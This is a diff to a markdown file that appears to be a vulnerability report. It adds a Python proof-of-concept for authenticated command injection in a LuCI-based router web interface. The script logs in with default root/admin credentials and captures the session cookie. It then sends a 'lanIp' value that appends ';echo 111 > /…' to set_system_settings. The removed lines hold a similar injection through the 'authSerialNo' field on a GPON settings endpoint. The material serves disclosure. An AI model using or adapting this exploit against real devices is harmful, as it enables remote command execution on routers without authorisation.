--- a/3.md
+++ b/3.md
@@ -1,35 +1,145 @@
-POST /cgi-bin/luci/ HTTP/1.1
-User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
-Accept-Encoding: gzip, deflate, br
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-Connection: keep-alive
-Content-Type: application/x-www-form-urlencoded
+#### POC
+
+```
+import requests
+from urllib.parse import parse_qs
+import urllib
+
+proxies1 = {
+    'http': 'http://127.0.0.1:8080',
+    'https': 'http://127.0.0.1:8080',
+}
+
+def str_to_head_dict(input_str):
+    tar_dict = {}
+    lines = input_str.strip().split('\n')
+    for line in lines:
+        if ': ' in line:
+            key, value = line.split(': ', 1)
+            tar_dict[key.strip()] = value.strip()
+    return tar_dict
+
+def parse_query_string(query_string):
+    query_dict = {}
+    pairs = query_string.split("&")  
+
+    for pair in pairs:
+        if pair:  
+            key_value = pair.split("=")
+            if len(key_value) == 2:
+                key, value = key_value
+                query_dict[key] = value
+
+    return query_dict
+
+
+def parse_query_string_nowhite(query_string):
+    decoded_str = urllib.parse.unquote(query_string)
+
+    pairs = decoded_str.split('&')
+
+ 
+    request_dict = {}
+    for pair in pairs:
+        eq_index = pair.find('=')
+        if eq_index != -1:
+            key = pair[:eq_index]
+            value = pair[eq_index + 1:]
+        else:
+            key = pair
+            value = ''
+        
+        request_dict[key] = value
+
+   
+    return (request_dict)
+
+
+def make_GET_request(url,header_dict,data_dict={},proxy=None):
+    # url = "http://192.168.1.101:8080/gh3fuzz/1011854.php"
+    headers = {
+        'Host': "192.168.1.101:8080",
+        'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0",
+        'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
+        'Accept-Language': "en-US,en;q=0.5",
+        'Accept-Encoding': "gzip, deflate",
+        'Connection': "close",
+        'Upgrade-Insecure-Requests': "1",
+        'Sec-Fetch-Dest': "document",
+        'Sec-Fetch-Mode': "navigate",
+        'Sec-Fetch-Site': "none",
+    }
+    data = {
+        
+    }
+    data.update(data_dict)
+    headers.update(header_dict)
+
+    response = requests.get(url, headers=headers, params=data, proxies=proxy)
+    print(response.text)    
+
+def make_POST_request(url,header_dict,data_dict={},get_header=0,get_data=0,proxy=None):
+    # url = "http://192.168.1.101:8080/gh3fuzz/1011854.php"
+    payload = "username=admin&password=admin"
+    headers = {
+        'Content-Type': "application/x-www-form-urlencoded",
+        'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0",
+    }
+    data = {
+        
+    }
+    data.update(data_dict)
+    headers.update(header_dict)
+
+    response = requests.post(url, headers=headers, data=data, proxies=proxy)
+    print(response.text)
+    if get_header:
+        print(response.headers)
+        return response.headers
+
+if __name__ == "__main__":
+    url = "http://172.17.0.2"
+
+    # 
+    header_info = make_POST_request(url+"/cgi-bin/luci/",str_to_head_dict("""
 Host: 172.17.0.2
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
 Content-Length: 80
 Origin: http://172.17.0.2
+Connection: keep-alive
 Referer: http://172.17.0.2/cgi-bin/luci
 Cookie: repeatTimes=0; isLogin=false; __guid=21234567
 Upgrade-Insecure-Requests: 1
 Priority: u=0, i
+"""),parse_query_string_nowhite("""username-show=root&username=cm9vdA%3D%3D&password-show=admin&password=YWRtaW4%3D"""),1)#,0,proxy=proxies1)
 
-username-show=root&username=cm9vdA%3D%3D&password-show=admin&password=YWRtaW4%3D
+    set_cookie = header_info["Set-Cookie"]
+    print(set_cookie)
+    path = set_cookie.split("; ")[1].split("path=")[1]
+    sysauth = set_cookie.split("; ")[0].split("=")[1]
 
 
-
-
-POST /cgi-bin/luci/;stok=45b068198a390c009d934b99511a1732/admin/gpon/set-net-settings HTTP/1.1
-User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
-Accept-Encoding: gzip, deflate, br
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-Connection: keep-alive
-Content-Type: application/x-www-form-urlencoded
+    make_POST_request(url+path+"/admin/system/set_system_settings",str_to_head_dict("""
 Host: 172.17.0.2
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
 Referer: http://172.17.0.2/cgi-bin/luci
-Cookie: sysauth=cd45cccd41728ed81caadf928742b8b5; repeatTimes=0; isLogin=true; __guid=209503442.1611206664802250800.1716428588737.2761
+Cookie: sysauth={}; repeatTimes=0; isLogin=true; __guid=209503442.1611206664802250800.1716428588737.2761
 Upgrade-Insecure-Requests: 1
-Priority: u=0, i
-Content-Length: 72
+Priority: u=0, i""".format(sysauth)),parse_query_string_nowhite("""lanIp=1;echo 111 > /1011854_test_action_set_system_setting  """),1)#,0,proxy=proxies1)0,proxy=proxies1)
 
-authSerialNo=a%3Becho+111+%3E+%2F1011854_test_action_set_net_settings&+=
+
+```
+
+
+
+#### Result
+
+there will be a file named "1011854_test_action_set_system_setting" with content "111".
